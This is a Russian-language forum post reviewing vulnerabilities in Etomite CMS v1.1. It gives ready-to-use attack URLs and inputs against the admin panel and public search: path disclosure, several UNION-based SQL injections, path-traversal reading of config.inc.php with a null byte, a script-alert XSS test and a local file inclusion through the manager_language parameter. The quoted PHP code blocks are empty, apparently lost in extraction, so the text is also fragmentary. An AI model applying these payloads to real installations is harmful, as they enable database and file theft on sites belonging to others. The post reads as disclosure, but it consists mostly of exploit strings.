![]() |
Обзор уязвимостей Etomite CMS v1.1
1)Раскрытие путей
Код:
http://host/manager/actions/static/document_data.static.action.phpКод:
http://host/manager/includes/accesscontrol.inc.phpУсловия: Доступ в панель администрирования Код:
http://host/manager/index.php?a=3&id=-1 union select user(),2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27/*PHP код:
PHP код:
Условия: Доступ в панель администрирования Код:
В админке, заходи в поиск и в строке поиска по id пишем 1' union select 1,2,user(),4,5,6,7/*PHP код:
Условия: Доступ в панель администрирования Код:
При выставлении прав групп пользователей на права просмотра группы документов подменяем в POST запросе параметр usergroup на 1'union select 1,2,3/*PHP код:
Условия: Доступ в панель администрирования Код:
http://host/manager/index.php?a=31&mode=edit&path=[full_path_to_file]PHP код:
PS Конструктивную критику воспринимаю очень хорошо ;) |
6)Произвольное чтение файлов
Условия: MG=off и RG=on Код:
http://host/manager/actions/static/document_data.static.action.php?id=3/../../../../includes/config.inc.php%00PHP код:
Условия: MG=off Код:
В поле поиска на главной страннице вводим ')union/**/select/**/1,2,3,user()# и в конце странниц результата поиска видим пользователя mysqlPHP код:
|
8)SQL-injection
Условия: Доступ в панель администрирования Код:
http://host/manager/index.php?int_cur_position=100%20union%20select%201,2,3,4,5,6,7,user%28%29/*&a=13&searchuser=&action=0&itemid=0&itemname&message=&dateto=&datefrom=&nrresults=100&log_submit=SearchPHP код:
PHP код:
Код:
1 union select 1,2,3,4,5,6,7,user()/* |
9)SQL-injection
Условия: Доступ в панель администрирования Код:
http://host/manager/index.php?a=10&id=1 and 3=1 union select 1,2,user(),4,5,1,7,8,9/*&m=rPHP код:
Код:
http://host/manager/index.php?a=10&t=c&m=rp&id=1 and 3=1 union select 1,2,user(),4,5,1,7,8,9/*PHP код:
PHP код:
Условия: Доступ в панель администрирования Не фильтруемые поля "Subject" и "Message" при отправке сообщения вставляем Код:
<script>alert('hello')</script>PHP код:
|
LFI(требования: mq=off,rq=on)
manager/index.php PHP код:
PHP код:
Код:
manager/index.php?manager_language=../../../../../[file]%00 |
| Время: 00:39 |